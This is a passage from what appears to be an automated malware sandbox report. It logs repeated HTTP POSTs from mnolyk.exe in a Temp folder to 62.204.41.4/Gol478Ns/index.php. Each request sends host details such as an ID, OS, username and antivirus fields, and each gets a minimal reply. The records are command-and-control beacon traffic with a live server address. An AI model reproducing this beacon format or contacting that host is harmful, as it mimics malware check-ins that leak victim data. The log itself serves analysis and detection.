                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.961194038 CET | 411 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        211 | 192.168.2.5 | 49901 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:45.128470898 CET | 412 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.193317890 CET | 412 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        212 | 192.168.2.5 | 49902 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:45.366775990 CET | 413 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.431293964 CET | 413 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        213 | 192.168.2.5 | 49903 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:45.622795105 CET | 414 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.688411951 CET | 414 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        214 | 192.168.2.5 | 49904 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:45.863997936 CET | 415 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.929059982 CET | 415 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        215 | 192.168.2.5 | 49905 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:46.099036932 CET | 416 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.166430950 CET | 416 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        216 | 192.168.2.5 | 49906 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:46.332969904 CET | 417 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.397893906 CET | 417 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        217 | 192.168.2.5 | 49907 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:46.566674948 CET | 418 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.630750895 CET | 418 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        218 | 192.168.2.5 | 49908 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:46.800738096 CET | 419 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.871973991 CET | 419 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        219 | 192.168.2.5 | 49909 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:47.051764965 CET | 420 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.122370005 CET | 420 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        22 | 192.168.2.5 | 49712 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:34.380434036 CET | 222 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:34.447359085 CET | 223 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        220 | 192.168.2.5 | 49910 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:47.301538944 CET | 421 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.367959976 CET | 421 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        221 | 192.168.2.5 | 49911 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:47.534707069 CET | 422 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.599071980 CET | 422 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        222 | 192.168.2.5 | 49912 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:47.771913052 CET | 423 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.835026026 CET | 423 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        223 | 192.168.2.5 | 49913 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:48.004987955 CET | 424 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.071654081 CET | 424 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        224 | 192.168.2.5 | 49914 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:48.241764069 CET | 425 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.306983948 CET | 425 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        225 | 192.168.2.5 | 49915 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:48.482167006 CET | 426 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.547434092 CET | 426 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        226 | 192.168.2.5 | 49916 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:48.720590115 CET | 427 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.785530090 CET | 427 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        227 | 192.168.2.5 | 49917 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:48.955073118 CET | 428 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.018578053 CET | 428 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        228 | 192.168.2.5 | 49918 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:49.195230007 CET | 429 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.261090040 CET | 429 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
